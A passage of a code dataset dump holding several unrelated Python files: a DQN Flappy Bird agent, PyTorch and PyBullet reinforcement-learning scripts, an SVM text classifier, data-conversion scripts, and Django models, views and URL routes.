(one-hot)\r\n\t\tself.yInput = tf.placeholder(\"float\", [None]) # target\r\n\t\tQ_action = tf.reduce_sum(tf.multiply(self.QValue, self.actionInput), reduction_indices=1)\r\n\t\tself.cost = tf.reduce_mean(tf.square(self.yInput - Q_action))\r\n\t\t# train_step minimizes the loss with the Adam optimizer.\r\n\t\tself.train_step = tf.train.AdamOptimizer(1e-6).minimize(self.cost)\r\n\t\t\r\n\t\t\r\n\t# train the network\r\n\tdef trainNetwork(self): # image input, readout layer, fully connected layer, tf training\r\n \r\n\t\t# gradient descent\r\n\t\t# sample a random minibatch of training data\r\n\t\tminibatch = random.sample(self.memory, BATCH)\r\n\t\tstate_batch = [d[0] for d in minibatch]\r\n\t\taction_batch = [d[1] for d in minibatch]\r\n\t\treward_batch = [d[2] for d in minibatch]\r\n\t\tnext_state_batch = [d[3] for d in minibatch]\r\n
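\t\t# Sketch of the standard DQN target computed below (added note):\r\n\t\t#   y_i = r_i                                       if s'_i is terminal\r\n\t\t#   y_i = r_i + GAMMA * max_a' Q_target(s'_i, a')   otherwise\r\n\t\t# The loss mean((y - Q(s, a))^2) is then minimized by the Adam step from createTrainingMethod().\r\n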
\t\t# compute the target values\r\n\t\ty_batch = []\r\n\t\tQValue_batch = self.QValueT.eval(feed_dict = {self.stateInputT : next_state_batch})\r\n\t\tfor i in range(0, BATCH):\r\n\t\t\tterminal = minibatch[i][4]\r\n\t\t\t# if terminal, only equals reward\r\n\t\t\tif terminal:\r\n\t\t\t\ty_batch.append(reward_batch[i])\r\n\t\t\telse:\r\n\t\t\t\ty_batch.append(reward_batch[i] + GAMMA * np.max(QValue_batch[i]))\r\n\t\t\t\t\r\n\t\t# perform gradient step\r\n\t\tself.train_step.run(feed_dict = {\r\n\t\t\tself.yInput : y_batch,\r\n\t\t\tself.actionInput : action_batch,\r\n\t\t\tself.stateInput : state_batch\r\n\t\t\t})\r\n\t\t\r\n\t\t# save progress every 10000 iterations\r\n\t\tif self.timeStep % 10000 == 0:\r\n\t\t\tself.saver.save(self.sess, 'saved_networks/' + GAME + '-dqn', global_step = self.timeStep)\r\n\t\t# update the target Q-network\r\n\t\tif self.timeStep % UPDATE_TIME == 0:\r\n\t\t\tself.copyTargetQNetwork()\r\n\r\n\t\t# push the new observation into the experience replay memory\r\n\tdef setPerception(self,nextObservation,action,reward,terminal):\r\n\t\tnewState = np.append(self.currentState[:,:,1:], nextObservation, axis = 2)\r\n\t\tself.memory.append((self.currentState, action, reward, newState, terminal))\r\n\t\t# keep the replay memory from growing unbounded\r\n\t\tif len(self.memory) > REPLAY_MEMORY:\r\n\t\t\tself.memory.popleft()\r\n\t\t# start training the network\r\n\t\tif self.timeStep > OBSERVE:\r\n\t\t\tself.trainNetwork()\r\n\t\t\r\n\t\t# print info\r\n\t\tstate = \"\"\r\n\t\tif self.timeStep <= OBSERVE:\r\n\t\t\tstate = \"observe\"\r\n\t\telif self.timeStep > OBSERVE and self.timeStep <= OBSERVE + EXPLORE:\r\n\t\t\tstate = \"explore\"\r\n\t\telse:\r\n\t\t\tstate = \"train\"\r\n\r\n\t\tprint (\"TIMESTEP\", self.timeStep, \"/ STATE\", state, \\\r\n\t\t\t\"/ EPSILON\", self.epsilon)\r\n\r\n\r\n\t\tself.currentState = newState\r\n\t\tself.timeStep = self.timeStep + 1\r\n\t\r\n\tdef getAction(self):\r\n\t\t# choose an action epsilon-greedily\r\n\t\tQValue = self.QValue.eval(feed_dict={self.stateInput : [self.currentState]})[0]\r\n\t\taction = np.zeros([ACTIONS])\r\n\t\taction_index = 0\r\n\t\tif self.timeStep % FRAME_PER_ACTION == 0:\r\n\t\t\tif random.random() <= self.epsilon:\r\n\t\t\t\tprint(\"----------Random Action----------\")\r\n\t\t\t\taction_index = random.randrange(ACTIONS)\r\n\t\t\t\taction[action_index] = 1\r\n\t\t\telse:\r\n\t\t\t\tprint(\"----------QNetwork Action----------\")\r\n\t\t\t\taction_index = np.argmax(QValue)\r\n\t\t\t\taction[action_index] = 1\r\n\t\telse:\r\n\t\t\taction[0] = 1 # do nothing\r\n\t\t\r\n\t\t# anneal epsilon\r\n\t\tif self.epsilon > FINAL_EPSILON and self.timeStep > OBSERVE:\r\n\t\t\tself.epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE\r\n\r\n\t\treturn action\r\n\t\t\r\ndef preprocess(observation):\r\n\tobservation = cv2.cvtColor(cv2.resize(observation, (80, 80)), cv2.COLOR_BGR2GRAY)\r\n\tret, observation = cv2.threshold(observation,1,255,cv2.THRESH_BINARY)\r\n\treturn np.reshape(observation,(80,80,1))\r\n\t\t\r\n\t\t\r\ndef playGame():\r\n\t# initialize DQN-Nature\r\n\tbrain = DQN_NATURE()\r\n\t# open the game and its emulator interface\r\n\tflappyBird = game.GameState()\r\n\t# start the game\r\n\t# get the initial state\r\n\taction0 = np.array([1,0]) # do nothing\r\n\tobservation0, reward0, terminal = flappyBird.frame_step(action0)\r\n\t# first resize the frame to 80*80, then convert it to grayscale\r\n\tobservation0 = cv2.cvtColor(cv2.resize(observation0, (80, 80)), cv2.COLOR_BGR2GRAY)\r\n\t# binarize the grayscale image\r\n\tret, observation0 = cv2.threshold(observation0,1,255,cv2.THRESH_BINARY)\r\n\tbrain.setInitState(observation0)\r\n\r\n\t# main game loop\r\n\twhile 1 != 0:\r\n\t\taction = brain.getAction()\r\n\t\tnextObservation,reward,terminal = flappyBird.frame_step(action)\r\n\t\tnextObservation = preprocess(nextObservation)\r\n\t\tbrain.setPerception(nextObservation,action,reward,terminal)\r\n\t\r\n\r\ndef main():\r\n    playGame()\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n\t\r\n\t\r\n\t\r\n","sub_path":"DQN-NATURE.py","file_name":"DQN-NATURE.py","file_ext":"py","file_size_in_byte":11414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"398291110","text":"from sqlalchemy import Column, Integer, String, ForeignKey #add all primary types that are going to be used\nfrom database import db\nimport datetime\n
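\n# Hypothetical usage sketch (added note; assumes `db` is the configured\n# Flask-SQLAlchemy instance from database.py and an app context is active):\n#   db.create_all()\n#   db.session.add(TaskStatus(id_task_status=1, description='open'))\n#   db.session.add(Task(task_name='write docs'))  # defaults to status 1\n#   db.session.commit()\n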
\nclass Task(db.Model):\n    __tablename__ = 'tasks'\n    id_task = db.Column(Integer, primary_key=True)\n    task_name = db.Column(String(150), nullable=False)\n    id_task_status = db.Column(Integer, ForeignKey('task_statuses.id_task_status'))\n    # renamed from 'description': this is a relationship, and a backref name must be a valid identifier\n    task_status = db.relationship('TaskStatus', backref=db.backref('tasks'))\n    #add needed fields\n\n    def __init__(self, task_name=None, id_task_status=1):\n        self.task_name = task_name\n        self.id_task_status = id_task_status\n\nclass TaskStatus(db.Model):\n    __tablename__ = 'task_statuses'\n    id_task_status = db.Column(Integer, primary_key=True)\n    description = db.Column(String(70))\n\n    def __init__(self, id_task_status=None, description=None):\n        self.id_task_status = id_task_status\n        self.description = description\n","sub_path":"initial_script/models/task_model.py","file_name":"task_model.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"79355453","text":"import torch.nn as nn\nimport torch.nn.functional as F\nfrom i2a.utils import get_linear_dims_after_conv\n\n\n# see B.1: model free path uses identical network as the standard model-free baseline agent (without the fc layers)\nclass LatentSpaceModelFreeNetwork(nn.Module):\n    def __init__(self, obs_shape, num_outputs=512):\n        super(LatentSpaceModelFreeNetwork, self).__init__()\n        self._output_size = num_outputs\n\n        input_channels = obs_shape[0]\n        input_dims = obs_shape[1:]\n\n        self.conv1 = nn.Conv2d(input_channels, 16, kernel_size=3, stride=1, padding=0)\n        self.conv2 = nn.Conv2d(16, 16, kernel_size=3, stride=2, padding=0)\n        self.conv3 = nn.Conv2d(16, 16, kernel_size=3, stride=2, padding=0)\n        self.conv4 = nn.Conv2d(16, 16, kernel_size=3, stride=2, padding=0)\n\n        linear_input_size = get_linear_dims_after_conv([self.conv1, self.conv2, self.conv3, self.conv4], input_dims)\n        self.fc = nn.Linear(linear_input_size, num_outputs)\n\n    def forward(self, x):\n        x = F.leaky_relu(self.conv1(x))\n        x = F.leaky_relu(self.conv2(x))\n        x = F.leaky_relu(self.conv3(x))\n        x = F.leaky_relu(self.conv4(x))\n\n        x = x.view(x.size(0), -1)\n        x = self.fc(x)\n        return x\n\n    def output_size(self):\n        return self._output_size","sub_path":"i2a/latent_space/models/latent_space_model_free_network.py","file_name":"latent_space_model_free_network.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"125261038","text":"import time\nimport os\nimport inspect\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(os.path.dirname(currentdir))\nos.sys.path.insert(0, parentdir)\nprint(\"parentdir=\", parentdir)\nimport json\nfrom pybullet_envs.deep_mimic.learning.rl_world import RLWorld\nfrom pybullet_envs.deep_mimic.learning.ppo_agent import PPOAgent\n\nimport pybullet_data\nfrom pybullet_utils.arg_parser import ArgParser\nfrom pybullet_utils.logger import Logger\nfrom pybullet_envs.deep_mimic.env.pybullet_deep_mimic_env import PyBulletDeepMimicEnv\nimport sys\nimport random\nimport numpy as np\nimport parmap\n
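# Added note: PyBullet's deep_mimic examples step the simulation at 240 Hz,\n# so each world update below advances physics by a single 1/240 s tick.\nupdate_timestep = 1. 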
/ 240.\nanimating = True\nstep = False\ntotal_reward = 0\nsteps = 0\nrewards = []\neps = 0\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef update_world(world, time_elapsed):\n timeStep = update_timestep\n world.update(timeStep)\n reward = world.env.calc_reward(agent_id=0)\n global total_reward\n total_reward += reward\n global steps\n global eps\n steps += 1\n\n # print(\"reward=\",reward)\n # print(\"steps=\",steps)\n end_episode = world.env.is_episode_end()\n if (end_episode or steps >= 1000):\n # print(\"total_reward=\",total_reward)\n rewards.append(total_reward)\n print(\"total_reward=\", total_reward)\n total_reward = 0\n eps += 1\n steps = 0\n world.end_episode()\n world.reset()\n return\n\n\ndef build_arg_parser(args):\n arg_parser = ArgParser()\n arg_parser.load_args(args)\n\n arg_file = arg_parser.parse_string('arg_file', '')\n if arg_file == '':\n arg_file = \"run_humanoid3d_walk_args.txt\"\n if (arg_file != ''):\n path = pybullet_data.getDataPath() + \"/args/\" + arg_file\n succ = arg_parser.load_file(path)\n Logger.print2(arg_file)\n assert succ, Logger.print2('Failed to load args from: ' + arg_file)\n return arg_parser\n\n\nargs = sys.argv[1:]\n\n\ndef build_world(args, enable_draw, model_path=\"~/deepmimic_output\", i=0):\n arg_parser = build_arg_parser(args)\n print(\"enable_draw=\", enable_draw)\n env = PyBulletDeepMimicEnv(arg_parser, enable_draw)\n world = RLWorld(env, arg_parser)\n # world.env.set_playback_speed(playback_speed)\n\n motion_file = arg_parser.parse_string(\"motion_file\")\n print(\"motion_file=\", motion_file)\n bodies = arg_parser.parse_ints(\"fall_contact_bodies\")\n print(\"bodies=\", bodies)\n int_output_path = arg_parser.parse_string(\"int_output_path\")\n print(\"int_output_path=\", int_output_path)\n agent_files = pybullet_data.getDataPath() + \"/\" + arg_parser.parse_string(\"agent_files\")\n\n AGENT_TYPE_KEY = \"AgentType\"\n\n print(\"agent_file=\", agent_files)\n with open(agent_files) as data_file:\n json_data = json.load(data_file)\n print(\"json_data=\", json_data)\n assert AGENT_TYPE_KEY in json_data\n agent_type = json_data[AGENT_TYPE_KEY]\n print(\"agent_type=\", agent_type)\n agent = PPOAgent(world, id, json_data)\n\n agent.set_enable_training(False)\n\n world.load_agents(path=model_path, i=i)\n world.reset()\n return world\n\n\ndef main(i, path=\"/home/thscowns/deepmimic_output/projected_walk/\"):\n # f = open(\"~/deepmimic_output/\")\n world = build_world(args, False, model_path=path, i=i)\n rewards = []\n total_reward = 0\n eps = 0\n steps = 0\n while (world.env._pybullet_client.isConnected() and eps <10):\n\n timeStep = update_timestep\n # time.sleep(timeStep)\n keys = world.env.getKeyboardEvents()\n animating = True\n if world.env.isKeyTriggered(keys, ' '):\n animating = not animating\n if world.env.isKeyTriggered(keys, 'i'):\n step = True\n if (animating or step):\n world.update(timeStep)\n reward = world.env.calc_reward(agent_id=0)\n steps += 1\n step = False\n end_episode = world.env.is_episode_end()\n total_reward += reward\n if (end_episode or steps >= 1000):\n # print(\"total_reward=\",total_reward)\n rewards.append(total_reward)\n print(\"total_reward=\", total_reward)\n total_reward = 0\n eps += 1\n steps = 0\n world.end_episode()\n world.reset()\n\n\n rewards = np.array(rewards)\n # world.load_agents(path=path, i=i * 100)\n mean = np.mean(rewards)\n std = np.std(rewards)\n print(\"mean=\", mean)\n print(\"std=\", std)\n return mean, std\n\n\ndef multi(list, path):\n return [main(i * 100, path) for i in 
list]\n\n\ndef square(l, p):\n return [(x, x + p) for x in l]\n\n\ndef plot(x, data, file_path):\n fig, ax = plt.subplots()\n ax.set_xlabel(\"Iteration\")\n ax.set_ylabel(\"Return\")\n for i in data.keys():\n mean = data[i][0]\n std = data[i][1]\n ax.plot(x * 100, mean, label=i)\n\n plt.fill_between(x * 100, mean-std, mean+std, alpha=.1)\n plt.legend()\n plt.savefig(file_path)\n\n\nif __name__ == '__main__':\n num_cores = 16\n data = list(range(0, 140))\n splited_data = np.array_split(data, num_cores)\n splited_data = [x.tolist() for x in splited_data]\n # paths = [3, 7, 10]\n paths = [\"attached_out_walk/\", \"projected_walk/\", \"aligned_walk/\"]\n res = {}\n for p in paths:\n # path = \"/home/thscowns/deepmimic_output/attached_out_walk/\"\n result = parmap.map(multi, splited_data, \"/home/thscowns/deepmimic_output/\" + p, pm_pbar=True, pm_processes=num_cores)\n '''result = parmap.map(square, splited_data, p, pm_pbar=True,\n pm_processes=num_cores)'''\n print(result)\n # results = np.array(result).flatten()\n\n # print(\"results=\", results)\n mean = []\n std = []\n for x in result:\n for y in x:\n mean.append(y[0])\n std.append(y[1])\n print(\"mean=\", mean)\n print(\"std=\", std)\n res[p] = (np.array(mean), np.array(std))\n plot(np.array(data), res, \"deepmimic_output/rewards_log_walk.png\")\n# main(2*100)\n","sub_path":"examples/pybullet/gym/pybullet_envs/deep_mimic/parmap_test.py","file_name":"parmap_test.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52877896","text":"#Epub File Reading and store as a txt file pyhton\r\nfrom epub_conversion.utils import open_book, convert_epub_to_lines\r\nfrom inscriptis import get_text\r\nimport re\r\nimport os\r\n# -*- coding: utf-8 -*-\r\nimport sys\r\nimport nltk\r\nimport pandas as pd\r\nfrom cltk.tokenize.sentence import TokenizeSentence\r\nfrom translate import translator\r\n#nltk.download()\r\nfrom nltk.tokenize import sent_tokenize, word_tokenize\r\nfrom openpyxl.workbook import Workbook\r\nfrom selenium import webdriver\r\nimport time\r\nimport pickle\r\nimport random\r\ndir0='F:/hindi_english_downloaded_split/ont_to_five/english_corpora'\r\nos.chdir(dir0)\r\ntotal_file=0\r\nlist_dir0=os.listdir()\r\nfile_low_list=[]\r\nsent=0\r\n#English=[]\r\n#Hindi=[]\r\n#trans=[]\r\nfor io in range(len(list_dir0)):\r\n dir1=dir0+'/'+str(list_dir0[io])\r\n os.chdir(dir1)\r\n list_dir=os.listdir()\r\n for j in range(len(list_dir)):\r\n English=[]\r\n Hindi=[]\r\n trans=[]\r\n dir2=dir1+'/'+str(list_dir[j])\r\n os.chdir(dir2)\r\n print(dir2)\r\n df_section=pd.read_excel('parallel_corpora.xlsx')\r\n df_sentence=pd.read_excel('parallel_corpora_2.xlsx')\r\n df_doubt=pd.read_excel('Doubtfull_sentences.xlsx')\r\n English.extend(df_section['English'])\r\n Hindi.extend(df_section['Hindi'])\r\n trans.extend(df_section['Translated'])\r\n English.extend(df_sentence['English'])\r\n Hindi.extend(df_sentence['Hindi'])\r\n trans.extend(df_sentence['Translated'])\r\n English.extend(df_doubt['English'])\r\n Hindi.extend(df_doubt['Hindi'])\r\n trans.extend(df_doubt['Translated'])\r\n sent=sent+len(trans)\r\n print(len(trans))\r\n Data_frame_Translation=pd.DataFrame()\r\n Data_frame_Translation['English']=English\r\n Data_frame_Translation['Hindi']=Hindi\r\n Data_frame_Translation['Translated']=trans \r\n 
Data_frame_Translation.to_excel('Englidh_Hindi_Final_Corpora_v1.xlsx',index=False)\r\n'''os.chdir('F:/hindi_english_downloaded_split/epub')\r\nData_frame_Translation=pd.DataFrame()\r\nData_frame_Translation['English']=English\r\nData_frame_Translation['Hindi']=Hindi\r\nData_frame_Translation['Translated']=trans\r\nData_frame_Translation.to_excel('all.xlsx',index=False)'''\r\n","sub_path":"doubtfull_sentences_parallel_corpora_combine.py","file_name":"doubtfull_sentences_parallel_corpora_combine.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"351250685","text":"#!~/miniconda3/env/tf2/bin/python\nimport json\nimport numpy as np\nimport struct\nimport os\n\n# parameter settings\njson_file = \"./poseAdd2Id.json\"\nbinary_file = \"RawData.bin\"\nnum_frame = 1097\nnum_person = 5\nperson_lib = np.zeros([num_person, 4])\ndata_written = 0\n\n# check whether the json file exists\nif os.path.isfile(json_file):\n    # start converting the data format\n    with open(json_file, \"r\") as f:\n        personDict = json.load(f)\nelse:\n    # no json file, so there is nothing to load\n    raise Exception(\"No json file. Would you like to load with your hammer?\")\n\n# write the binary file\nwith open(binary_file, \"wb\") as fp:\n    for i in range(num_frame):\n        personInfo = personDict[str(i)]\n        for PersonIndex, PersonData in personInfo.items():\n            # ignore the pose keypoints; only keep the box position (x1, y1, x2, y2)\n            box = PersonData[0:4]\n            # update the box info into the array\n            person_lib[ord(PersonIndex) - ord(\"1\"), :] = box\n        # round the coordinates, then convert them to int\n        # buffer = np.round(person_lib).astype(int)\n        # avoid astype here: it produces numpy integer types rather than plain Python int\n        for n in range(num_person):\n            for d in range(4):\n                # must be a plain Python int before packing\n                data_int = int(round(person_lib[n, d]))\n                if data_int < 0:\n                    data_int = int(0)\n                assert type(data_int)==int\n                # coordinates never exceed 32767, so 2 bytes suffice for the binary encoding\n                raw_int = struct.pack(\"h\", np.int16(data_int))\n                # write to the file buffer\n                fp.write(raw_int)\n                # count the data written\n                data_written += 1\n
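# Size check (added note): each frame contributes num_person * 4 int16 values,\n# so the expected file size is num_frame * num_person * 4 * 2 = 1097 * 5 * 4 * 2 = 43,880 bytes.\nprint(\"Finish. 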
%d data written.\" % data_written)\n","sub_path":"convert_data.py","file_name":"convert_data.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"261137718","text":"import pandas\nimport numpy\nimport math\nfrom sklearn.svm import SVC\nfrom sklearn import datasets\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.cross_validation import cross_val_score, KFold\nfrom sklearn.grid_search import GridSearchCV\n\nnews_group = datasets.fetch_20newsgroups(subset='all', categories=['alt.atheism', 'sci.space'])\n\nvectorizer = TfidfVectorizer()\nnews_group.data = vectorizer.fit_transform(news_group.data)\n\n# initialize valitador\ncv = KFold(len(news_group.target), shuffle=True, n_folds=5, random_state=241)\n\n# declare parameters\nC_vals = [10**x for x in range(-5, 6)]\nparameters = { 'kernel': ['linear'], 'C': C_vals, 'random_state': [241] }\n\nsvc = SVC(random_state=241)\n\nmodel = GridSearchCV(svc, parameters, cv=cv)\nmodel.fit(news_group.data, news_group.target)\nbest_params = model.best_params_\nC = best_params['C']\n\nmodel = SVC(kernel='linear', C=C, random_state=241)\nmodel.fit(news_group.data, news_group.target)\n\n# gathering answer\nfeature_names = vectorizer.get_feature_names()\nfeatures_weights = model.coef_.toarray().tolist()[0]\nfeatures_weights = [math.fabs(w) for w in features_weights]\nfeature_weights_and_names = list(zip(features_weights, feature_names))\nfeature_weights_and_names.sort(key=lambda f: f[0])\ntop_words = [f[1] for f in feature_weights_and_names[-10:]]\ntop_words.sort()\n\nanswer = ','.join(top_words)\n\nsubmission_file = open('submissions/svm-texts/top_words.txt', 'w+')\nsubmission_file.write(answer)\nsubmission_file.close()\n\nprint(answer)\n","sub_path":"tasks/svm/svm-texts.py","file_name":"svm-texts.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"175608397","text":"from __future__ import print_function\nimport sys\nimport os\nimport gzip, json\nimport numpy as np\nfrom collections import Counter\n\nfrom alignment_datastructure import AlignedData\n\n\ndef main():\n #affinity_name = 'Linf'\n nclusters = 15170\n\n for affinity_name in ['L2', 'L1', 'Linf', 'angular']:\n # Create Affinity Matrix\n print(\"Creating {} Affinity Matrix...\".format(affinity_name))\n affinity = np.zeros((nclusters,nclusters), dtype=np.float)\n affinity.fill(np.inf)\n\n error_files = ('errors/{}_{}.error'.format(affinity_name, i) for i in range(0, nclusters))\n\n for cluster_number, f in enumerate(error_files):\n print(\"Loading {0}...\".format(f))\n cluster_number = int(f.split('.')[0][len('errors/{}_'.format(affinity_name)):])\n try:\n errors = np.loadtxt(f, skiprows=1)\n except IOError:\n print(\"FAILED\")\n continue\n if len(errors) != nclusters:\n print(\"FAILED\")\n continue\n affinity[cluster_number, :] = errors\n print(\"Finished loading!!!\")\n np.save('{}_affinity.npy'.format(affinity_name), affinity)\n return None\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"clustering/create_affinity.py","file_name":"create_affinity.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"291735997","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom apps.module_app.models 
import Module\nfrom .forms import ModuleForm\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\n# Create your views here.\n# module list page\n@login_required\ndef module_manage(request):\n    # username = request.COOKIES.get('user', '') # read the browser cookie\n    module_list = Module.objects.all()\n    username = request.session.get('user', '')  # read the browser session\n    paginator = Paginator(module_list, 15)\n    page = request.GET.get('page')\n    try:\n        contacts = paginator.page(page)\n    except PageNotAnInteger:\n        # If page is not an integer, deliver first page.\n        contacts = paginator.page(1)\n    except EmptyPage:\n        # If page is out of range (e.g. 9999), deliver last page of results.\n        contacts = paginator.page(paginator.num_pages)\n    return render(request, 'module_manage.html', {\"user\": username,\n                                                  \"modules\": contacts, \"type\": \"list\"})\n\n\n@login_required\ndef add_module(request):\n    # if this is a POST request we need to process the form data\n    if request.method == 'POST':\n        # create a form instance and populate it with data from the request:\n        form = ModuleForm(request.POST)\n        # check whether it's valid:\n        if form.is_valid():\n            # process the data in form.cleaned_data as required\n            # ...\n            project = form.cleaned_data['project']\n            name = form.cleaned_data['name']\n            description = form.cleaned_data['description']\n            try:\n                result = Module.objects.get(name=name)\n                if result:\n                    return render(request, 'module_manage.html',\n                                  {'form': form, \"type\": \"add_module\", 'error': 'duplicate name'})\n            except Module.DoesNotExist:\n                Module.objects.create(project=project, name=name, description=description)\n            return HttpResponseRedirect('/module/module_manage/')\n    # if a GET (or any other method) we'll create a blank form\n    else:\n        form = ModuleForm()\n\n    return render(request, 'module_manage.html', {'form': form, \"type\": \"add_module\"})\n\n\n@login_required\ndef edit_module(request, module_id):\n    if request.method == 'POST':\n        form = ModuleForm(request.POST)\n        if form.is_valid():\n            module = Module.objects.get(id=module_id)\n            module.project = form.cleaned_data['project']\n            module.name = form.cleaned_data['name']\n            module.description = form.cleaned_data['description']\n            try:\n                result = Module.objects.get(name=module.name)\n                # if a record with this name exists under a different id, report a duplicate\n                # name; the same id means the name was not changed\n                # (module_id arrives from the URL as a string, so compare as int)\n                if result.id != int(module_id):\n                    return render(request, 'module_manage.html',\n                                  {'form': form, \"type\": \"edit_module\", 'error': 'duplicate name'})\n                else:\n                    return HttpResponseRedirect('/module/module_manage/')\n            except Module.DoesNotExist:\n                module.save()\n                return HttpResponseRedirect('/module/module_manage/')\n    else:\n        if module_id:\n            form = ModuleForm(\n                instance=Module.objects.get(id=module_id))\n        return render(request, 'module_manage.html', {'form': form, \"type\": \"edit_module\"})\n\n\n# delete a module\n@login_required\ndef module_delete(request, module_id):\n    Module.objects.filter(id=module_id).delete()\n    response = HttpResponseRedirect('/module/module_manage/')\n    return response\n\n\n\n\n\n","sub_path":"apps/module_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"461182439","text":"from django.conf.urls import url, include\n
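# Added note: the pattern lists below are mounted via include(); for example,\n# a request to '/bioskopi/3/oceni/' resolves through bioskopi_patterns to\n# views.oceni_bioskop.\nfrom . 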
import views\n\nbioskopi_patterns = [\n url(r'^$', views.BioskopiView.as_view(), name='bioskopi'),\n url(r'^(?P\\d+)/$', views.bioskop_view, name='bioskop'),\n url(r'^dodaj/$', views.BioskopCreate.as_view(), name='add_bioskop'),\n url(r'^(?P\\d+)/azuriraj/$', views.BioskopUpdate.as_view(), name='update_bioskop'),\n url(r'^(?P\\d+)/obrisi/$', views.BioskopDelete.as_view(), name='delete_bioskop'),\n url(r'^(?P\\d+)/oceni/$', views.oceni_bioskop, name='oceni_bioskop'),\n url(r'^(?P\\d+)/dodaj/$', views.add_film, name='add_film'),\n url(r'^(?P\\d+)/ponude/$', views.ponude_filmovi, name='ponude_filmovi'),\n url(r'^(?P\\d+)/(?P\\d+)/$', views.film_view, name='film_view'),\n url(r'^(?P\\d+)/(?P\\d+)/azuriraj/$', views.update_film, name='update_film'),\n url(r'^(?P\\d+)/(?P\\d+)/obrisi/$', views.delete_film, name='delete_film'),\n url(r'^(?P\\d+)/(?P\\d+)/rezervisi/$', views.rezervisi_film, name='rezervisi_film'),\n url(r'^(?P\\d+)/(?P\\d+)/(?P\\d+)/rezervisi-klikom/$', views.rezervisi_film_klikom, name='rezervisi_film_klikom'),\n url(r'^(?P\\d+)/(?P\\d+)/oceni/$', views.oceni_film, name='oceni_film'),\n]\n\nrezervacije_filmova_patterns = [\n url(r'^$', views.RezervacijeFilmova.as_view(), name='rezervacije_filmova'),\n url(r'^(?P\\d+)/obrisi/$', views.delete_rezervacija_filma, name='delete_rezervacija_filma'),\n url(r'^(?P\\d+)/(?P\\d+)/prihvati-film/$', views.prihvati_poziv_film, name='prihvati_poziv_film'),\n url(r'^(?P\\d+)/(?P\\d+)/odbij-film/$', views.odbij_poziv_film, name='odbij_poziv_film'),\n]\n\npozorista_patterns = [\n url(r'^$', views.PozoristaView.as_view(), name='pozorista'),\n url(r'^(?P\\d+)/$', views.pozoriste_view, name='pozoriste'),\n url(r'^dodaj/$', views.PozoristeCreate.as_view(), name='add_pozoriste'),\n url(r'^(?P\\d+)/azuriraj/$', views.PozoristeUpdate.as_view(), name='update_pozoriste'),\n url(r'^(?P\\d+)/obrisi/$', views.PozoristeDelete.as_view(), name='delete_pozoriste'),\n url(r'^(?P\\d+)/oceni/$', views.oceni_pozoriste, name='oceni_pozoriste'),\n url(r'^(?P\\d+)/dodaj/$', views.add_predstava, name='add_predstava'),\n url(r'^(?P\\d+)/ponude/$', views.ponude_predstave, name='ponude_predstave'),\n url(r'^(?P\\d+)/(?P\\d+)/$', views.predstava_view, name='predstava_view'),\n url(r'^(?P\\d+)/(?P\\d+)/azuriraj/$', views.update_predstava, name='update_predstava'),\n url(r'^(?P\\d+)/(?P\\d+)/obrisi/$', views.delete_predstava, name='delete_predstava'),\n url(r'^(?P\\d+)/(?P\\d+)/rezervisi/$', views.rezervisi_predstavu, name='rezervisi_predstavu'),\n url(r'^(?P\\d+)/(?P\\d+)/(?P\\d+)/rezervisi-klikom/$', views.rezervisi_predstavu_klikom, name='rezervisi_predstavu_klikom'),\n url(r'^(?P\\d+)/(?P\\d+)/oceni/$', views.oceni_predstavu, name='oceni_predstavu'),\n]\n\nrezervacije_predstava_patterns = [\n url(r'^$', views.RezervacijePredstava.as_view(), name='rezervacije_predstava'),\n url(r'(?P\\d+)/obrisi/$', views.delete_rezervacija_predstave, name='delete_rezervacija_predstave'),\n url(r'(?P\\d+)/(?P\\d+)/prihvati-predstavu/$', views.prihvati_poziv_predstava, name='prihvati_poziv_predstava'),\n url(r'(?P\\d+)/(?P\\d+)/odbij-predstavu/$', views.odbij_poziv_predstava, name='odbij_poziv_predstava'),\n]\n\nprofile_patterns = [\n url(r'^$', views.user_profile, name='user_profile'),\n url(r'azuriraj/$', views.edit_profile, name='edit_profile'),\n url(r'promeni_lozinku/$', views.change_password, name='password_change'),\n]\n\nfriend_patterns = [\n url(r'^$', views.friends, name='friends'),\n url(r'dodaj/(?P\\d+)/$', views.add_friend, name='add_friend'),\n url(r'obrisi/(?P\\d+)/$', 
